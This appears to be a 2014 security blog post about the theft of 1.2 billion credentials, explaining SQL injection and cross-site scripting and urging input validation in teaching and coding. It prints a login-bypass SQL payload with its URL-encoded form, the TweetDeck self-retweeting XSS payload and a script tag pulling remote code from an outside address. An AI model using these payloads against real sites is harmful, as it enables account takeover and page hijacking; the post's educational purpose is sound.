SQL Injection: Shooting 1.2 Billion Fish in a Barrel using Someone Else’s Gun

IntroductionMining Man

No-one though that the scale of a hack go for much greater than with the Adobe compromise involving 150 million passwords, but it just did when, on 5 August 2014, it was annouched that over 1.2 billion usernames and passwords are gathered across the Internet. The reasons that this gathering worked so well point to three things: bad coding practice on Web sites (where the user input is not checked, and goes straight through to the database), the usage of proxy agents (bots) to both probe and gather the usernames and passwords, and phishing emails (which are used to compromise a host so that it becomes a bot. These three things make it so easy for intruders to target the collection of data, and then press the button, and wait. They then have a whole army of data harvesters, which are basically infected comptuers around the Internet. As long as there’s an unpatched system somwehere on the Internet, there’s the potential for bot to work on behalf of someone. As said previously in this blog, the three main targets are Adobe Reader, Adobe Flash and Oracle Java [Blog].

Unfortunately all three of the problems point to two things: humans producing bad code (not checking their code) and humans being silly (not patching their systems). So, as we will see, the root of many of the currently vulnerabilities is around XSS (Cross-site scripting) and SQL Injection, which are caused by human coders not understanding that there might be people that want to compromise their system. Developers are often under pressure in rolling-out their code, and only test their code for valid inputs, along with this they will often disable security controls when operating issues occur, and then forget to put them back in-place. A current target, though, is the copy-and-pasting of PHP code, which often is left unodified and without any security checking. Often the figure of 100:1 is used in terms of defining the ratio of hours/effort spent developing the system (dev ops) against the hours spend operating and evaluating the system (sys ops). It is obviously that this needs to change, and in the post we’ll see some of the pointers towards this.

The Heartbleed vulnerability focused on a human coding error within the OpenSSL encryption library, and which highlighted that it is humans who often cause most of the serious security vulnerabilitiy. Often these vulnerabilities can be traced to poor software development methods or practices. For example, the Adobe hack which exposed nearly 150 million passwords, had serveral pointers to poor security practice, including the fact that users could select extremely weak passwords, and which could be easily cracked. Another standard process which Adobe missed was to add salt to the encrypted version of the password. This method of salting makes it much more difficult to crack passwords on a database, even when weak passwords have been used.  The following outlines the details behind the Adobe hack:

where it can be seen from this that nearly 2 million users selected “123456” as their password, and once one password is cracked, every single other one with the same password is also cracked (note: a salted system does not reveal others which have the same source password).

Hackers now have a whole range of tools in their toolbox, where they can command a whole lot of proxy agents – known as a bot and controlled remotely as a botnet agent – who can do the vulnerability probing and data stealing on their behalf. Anyone listen to the network will not be able to find the original source of the probing, as it is done by one of the compromised agents. The creation of the botnet agent is often fairly simple for the hackers, as it normally involves sending a phishing email – such as with the link to an HRMC on-line Web link – and which compromises the system through an unpatched system. Common compromises include Adobe Reader, Adobe Flash and in Oracle Java, and where a backdoor agent is downloaded onto the compromised host, and then listens for events, such as logging into bank systems. They can also be used to send requests to remote sites, such as for the probing for usernames and passwords, and for DDoS (Distributed Denial of Service).

One of the easiest to steal data from an intruder, and often result in a success is to use either XSS (Cross-site scripting) or SQL Injection. With XSS, the intruder forces some script into the page to make it act incorrectly, and with SQL the page sends through an SQL command to the database, and which can reveal its content. If the developer does not check their code, or if they do not undertake a penetration test, the Web site can be a risk.

Forgot Heartbleed, this is worse!

On 5 August 2014, Hold Security, a Milwaukee-based company, released details of their investigation of a Russia-based criminal gang where the hackers stole 1.2 billion username/password combinations, along with more than 500 million email addresses. It thus puts both the Adobe hack (150 million usernames and passwords released) and Heartbleed into the shade.

This revelation was unveiled in a Black Hat computer-security conference in Las Vegas, (2-7 August 2014), and which, ironically, the same conference that two researchers from Carnegie Mellon University (Alexander Volynkin and Michael McCord) where to present their work on the exploitation of the Tor (The Onion Network) infrastructure, but where their researh presentation was pulled for reasons which are currently unknown.

There are thought to be 12 hackers involved in the password stealing attack, and who have been purchasing information on the online black market since 2011. The Russian hackers in the last exploit used malware infected hosts (typically infected through a phishing email to unpatched systems), to gather over 4.5 billion records. These hosts probed remote Web sites for SQL vulnerabilities, and, when discovered, they execute SQL injections to gain usernames and passwords. Overall they managed to compromise over 400,000 Web and FTP sites. A major problem with this is that users often use the same password for many different sites, so a compromise of one of their accounts, could cause a compromise on other accounts, for some time in the future.

SQL Injection

Many databases use a number of tables to store data records, and where the tables have a defined relationship between each other – known as a relational database. These often use SQL to search for data across the tables, and which was developed IBM in the early 1970s, and it still used within many software infastructures. SQL uses a simple language to define the data tables to be accessed, and the parameters to search for fields into the data records. An example of SQL is shown next:

The problem of SQL injection typically involves software developers not checking the input from the user (or from a bot request), and where SQL requests posted from the Web request is forwarded diretly to the database. This problem is typically caused when using a LAMP (Linux, Apache, MySQL and PHP) Web site. This often uses PHP code to send SQL requests to a MySQL database. A typical call to a database is:

SELECT * FROM accounts WHERE username=’$admin’ AND password=’$pass’

And where the users enters “admin” and “password” gives:

SELECT * FROM accounts WHERE username=’admin’ AND password=’password‘

Then an intruder could change this to:

SELECT * FROM accounts WHERE username=’admin’ AND password=’’ OR 1=1 – ‘

Which will always return a true for the match. To achieve this enter the following as a password:

‘ OR 1=1 --

And convert this to a URL string:

%20%27%20%4f%52%20%31%3d%31%20%2d%2d%20

When this is injected into the URL request for the page, it will show all the usernames and passwords on the database. There is almost an infinite number of these exploits, and an intruder will generally play around with a canary (forcing some text into the input and observing what happens). The following shows a demo of SQL Injection in an isolated infrastructure:

XSS (Cross-site Scripting)

TweetDeck started to spam tweets across the Internet, and it was caused by adding a heart symbol (♥) to the tweet, which caused the system to run a script within TweetDeck, and send a message to the user, and re-tweet links which had just arrived:

<script class="xss">$('.xss').parents().eq(1).find('a').eq(1).click();
$('[data-action=retweet]').click();alert('XSS in Tweetdeck')</script>♥

This highlights the current problem were Web developers spend very little time on analysing the user input for malicious code It simple use it just where a value is taken from the user input, and echo’ed straight to the Web page without checking, so when the user enters:

<script>alert(‘Oops I have been compromised’);</script>

it then echoed to the page, and, of course, will run the scripts as a piece of Javascript, and display a message box with “Ooops I have been compromised“. A common method of breaching a page is where unchecked user input is used to inject malicious code from a remote site. For example:

<script src="http://1.2.3.4/test.js"></script>

will inject some malicious code from a server at 1.2.3.4 into the page, which can cause a whole range of problems, such as breaching the login requirements for a page.

Key factors in system design

A software bug is either non-intentional or intentional. With an intentional bug, the developer has added in a backdoor into the code which, when exercised, will allow a remote party into the code. One company that was accused of this is Crypto AG who, it is report, that colluded with Bundesnachrichtendienst (BND) and National Security Agency (NSA), to read the encrypted traffic on the machines with the backdoor. For non-intentional we can classify as:

  • Switched OnValidation flaws. The code fails to check for valid input data. This is often a major problem with Web-based code, where the code has not been tested for the complete range of user inputs. An intruder can often probe and analyse responses, and then craft an input which breaches the operation of the code. As we will see, in the Tweet Desk Hack, the input injects some JavaScript into a link, and then does not automated click on the link. The link thus becomes a robot clicking link, and can be used to spam other users, and even bring down systems with a Denial of Service attack.
  • Domain flaws. This is where data leaks from one program to another.
  • Serialisation flaws. This is where data changes while being passed from one program to another.
  • Identification/Authentication flaws. This is where there is a lack of identification for processes or users.
  • Boundary condition flaws. This is where resource access is not checked, and can thus allow an external hacker to use up resources.
  • Logic flaws. This is where the logic of the program, such the way it implements loops of decisions causes the program to act incorrectly.

bugSome of the key factors to the design of software are:

  • Never trust user input. All user input check be checked before it is used. This includes checking for correct number/string format, including valid characters.
  • Principle of least privilege. Processes and scripts should run with the least privilege possible, to minimize damage.
  • User secure defaults. Sometimes developers encounter security problems in running and applications. It is important that these are fully tested before reducing the security.
  • Authenticate at the front-end. In terms of resources, it is often better to authentication at the front-end rather than the back-end.
  • Never trust external systems. External systems should always be seen as a potential risk, and should never be fully trusted.
  • Reduce surface area. This should minimize the information that can be accessed from outside, and to handle errors in a graceful way.
  • Never rely on obfuscated code. Obfuscation of code just makes it more difficult to determine its operation. If an intruder wants to “crack” a program, then normally can, so other methods of securing the code should be employed.
  • Defence-in-depth. Checkpoints should be added for authentication and authorization at software interfaces, and interfaces within modules.
  • If it’s not used … disable it! Any services which can be accessed can be compromised, thus, if they are not needed, they should be disabled.
  • System is only as secure as the weakest link. The overall security of a system is only as strong as its weakest link.

One of the threats that is often fairly easy for the user to breach is where the user input is not checked, and the following section sees how we can inject some JavaScript code into the page.

Why don’t we teach security in coding?

Academia have been teaching code since the 1950s, from FORTRAN and COBAL to modern languages such as C# and Java. Unfortunately the way we have taught them has now really changed, where we teach our students to code around a procedural and/or objective oriented approach. Academics thus spend much of their time teaching students who to design and specify a program, and then how to write it, and finally validate it. The validation process is often running the program with some normal data, then with some boundary conditions, and that it. If student is smart, they will make sure they do not trust the user input, so values are entered as strings, and then checked and converted into the correct format. So a sloppy piece of code is:

namespace ConsoleApplication1
{
    class Program
    {
        static void Main(string[] args)
        {
            int age;
            Console.WriteLine("What is your age?");
            age=Convert.ToInt32(Console.ReadLine());
            Console.WriteLine("Your age is " + age);
            Console.ReadLine();
        }
    }
}

which works fine when we enter an integer:

What is your age? 
32
Your age is 32

but when we enter “a” we get an exception of:

Input string was not in a correct format.

Having examined many student programs, we one thing is often missing is the checking and the catching of exceptions with try … catch (Exception) {} code. A better way is to actually check the characters entered in terms of whether the value is valid, such as for an integer. So if the value is negative, or greater than 110, or has letters, or has an invalid character, then tell the user, and ask them for the correct format.

A good example of this when a user is entering their IP address. In this case we can use a regular expression to look for four values with up to three digits, with a ‘.’ in-between:

 namespace ConsoleApplication1
{
    class Program
    {
        static void Main(string[] args)
        {
            Console.WriteLine("Enter an IP address:");
            string ip = Console.ReadLine();
            Match match = Regex.Match(ip, @"\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}");
            if (match.Success)
            {
                Console.WriteLine("IP is "+match.Value);
            }
            else Console.WriteLine("Invalid");
            Console.ReadLine();
        }
    }
}

The result is then:

Enter an IP address: 
1.2.3.4
IP is 1.2.3.4
Enter an IP address:
1.2..4
Invalid

Regular expressions are thus a wonder method in checking user input, to make sure that it matches the requirements, and provides a gate for code, where the program does not enter regions of the code, unless the input has been validated.

Conclusions

The main problem here is the lack to skills from software developers, especially for Web developers, in understanding the security risks of their sites, and not building the checking of input data in their code. Our software is moving to the Web, where much of the code does not run as a Windows or Mac program. The code that often runs of Web servers is often quite messy, and there’s a general lack of testing. Software development teams must thus learn the methods of securing their code, especially in checking data input at the gate, and never to trust user input. For some reason, we often don’t teach security to software developers, especially in an understanding of how to handle exceptions in user input or from external systems, and how we encrypt data. The lack of understanding often lead to passwords and user credentials not be stored in a secure way. This, for the future needs to change!

For many software programs now, the coding is becoming easier, as we link to trusted services or to well defined software libraries, but the testing and validation becomes difficult. Often as much time is spent testing, validating and evaluating a program, and its modules, as it can take to design, specify and implement it. Our teaching thus needs to change.

As for patching, we at a crossroads, where our mobile apps quite happily patch themselves on a regular basis, and never cause any issues, but on desktops we have grown to distrust the auto-patcher, especially in Microsoft Windows, where patches have often caused more problems than they solve. So deskop users often reach for the disable button when problems arise, and leave it on that option. Unfortunately patching cannot solve the SQL injection problem, but contributes either to the zombie army on the Internet, who either collect from the user, or who probe and collect from remote systems, making it almost impossible to find the original source of the maliciousness.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s